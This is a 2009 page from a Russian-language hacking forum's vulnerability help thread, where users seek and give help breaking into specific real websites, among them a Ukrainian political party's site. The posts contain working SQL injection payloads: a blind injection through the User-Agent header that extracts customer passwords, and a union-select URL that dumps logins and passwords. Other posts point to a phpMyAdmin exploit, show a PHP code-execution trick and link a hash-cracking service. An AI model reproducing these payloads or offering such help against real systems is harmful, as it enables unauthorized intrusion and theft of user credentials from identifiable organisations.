HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 942 из 2438 « Первая < 442842892932 938 939 940 941 942 943 944 945 946 952992104214421942 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #9411  
Старый 16.10.2009, 21:08
2Fed123
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426

Репутация: 5
Отправить сообщение для 2Fed123 с помощью ICQ
По умолчанию
Нашел инъекцию через юзер агента(Tampler data рулит).Как подставлять запросы?
Пробовал and+select+version() и тд-непрет.
Сайтик www.prozis.es
После названия браузера ставим кавычку.
Код:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (' at line 1

replace into robots (user_agent, last_access, num_access) values ('Mozilla/5.0' (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)',now(),0)
 
Ответить с цитированием

  #9412  
Старый 16.10.2009, 22:15
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию
',(more1row_or_duplicate_column_names),'1'),('M
 
Ответить с цитированием

  #9413  
Старый 16.10.2009, 22:29
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Цитата:
Сообщение от l1ght  
',(more1row_or_duplicate_column_names),'1'),('M
Вот смотрите, дорогие друзья, вот так НЕНАДО помогать новичкам

l1ght ты правда думаешь, что он понял?
 
Ответить с цитированием

  #9414  
Старый 16.10.2009, 22:46
cr0w
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780

Репутация: 585
По умолчанию
2Fed123

Почитай про blind-скл-инъекии статьи Elect'a и Qwazar'a на этом форуме.
Раскрутить можно:
Код:
User-Agent: Mozilla/5.0',if((locate(substr((select customers_password from customers limit 1),1),'0123456789abcdef')),now(),(select 1 union select 2)), 0) #
и т.д.
 
Ответить с цитированием

  #9415  
Старый 17.10.2009, 00:13
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию
Цитата:
Сообщение от TELO  
Такая ситуация.
Есть сайт одной украинской партии.
Есть скуля по нему
Код:
http://www.prp.org.ua/index.php?mid=10&action=news_full&news_id=-1229%20union%20select%201,login,3,password,5,6,7,8,9,10,11,12,13%20FROM%20private%20--
есть админка
Код:
http://www.prp.org.ua/phpmyadmin
есть ещё конфиг к ней, но я не знаю что с ней делать
Код:
http://www.prp.org.ua/phpmyadmin/scripts/setup.php
Вот ещё сдесь директ админ
Код:
http://www.prp.org.ua/config
помогите...пароли не подходят, и что можно со всем этим сделать
http://milw0rm.com/exploits/8921
 
Ответить с цитированием

  #9416  
Старый 17.10.2009, 00:28
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Насколько я понимаю, то к этому:
Цитата:
http://www.prp.org.ua/phpmyadmin/scripts/setup.php
этот сплойт:
Цитата:
http://milw0rm.com/exploits/8921
не прокатит, т.к. не подходит конфигурация пма.
 
Ответить с цитированием

  #9417  
Старый 17.10.2009, 10:15
Rezak
Новичок
Регистрация: 25.01.2008
Сообщений: 5
Провел на форуме:
9419

Репутация: 2
По умолчанию
Где-то видел тут на античате тему про, то как делать эксплоит скрипта типа
PHP код:
<? $a($b); ?>
он юзается примерно так: test.php?a=phpinfo&b=32
вот и подумал может с классами также можно извратиться.

P.S. Это к сообщению про вот этот скрипт
PHP код:
<?
$template->set_filenames(array('head'=>"$template_path/header.html"));
$template->pparse('head');
?>
Последний раз редактировалось Rezak; 17.10.2009 в 10:22..
 
Ответить с цитированием

  #9418  
Старый 17.10.2009, 10:44
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию
есть какие нибудь базы по хешам желательный на пхп или exe
 
Ответить с цитированием

  #9419  
Старый 17.10.2009, 11:09
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Цитата:
Сообщение от tracy  
есть какие нибудь базы по хешам желательный на пхп или exe
hashcracking.info
 
Ответить с цитированием

  #9420  
Старый 17.10.2009, 13:05
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию
Привет есть стандартная инъекция в MySQL вида:
site.ru/index.php?id=1+union+select+1,2,3,4,5--+
Возможно ли сделать UPDATE или INSERT в базу?
 
Ответить с цитированием
Ответ
Страница 942 из 2438 « Первая < 442842892932 938 939 940 941 942 943 944 945 946 952992104214421942 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ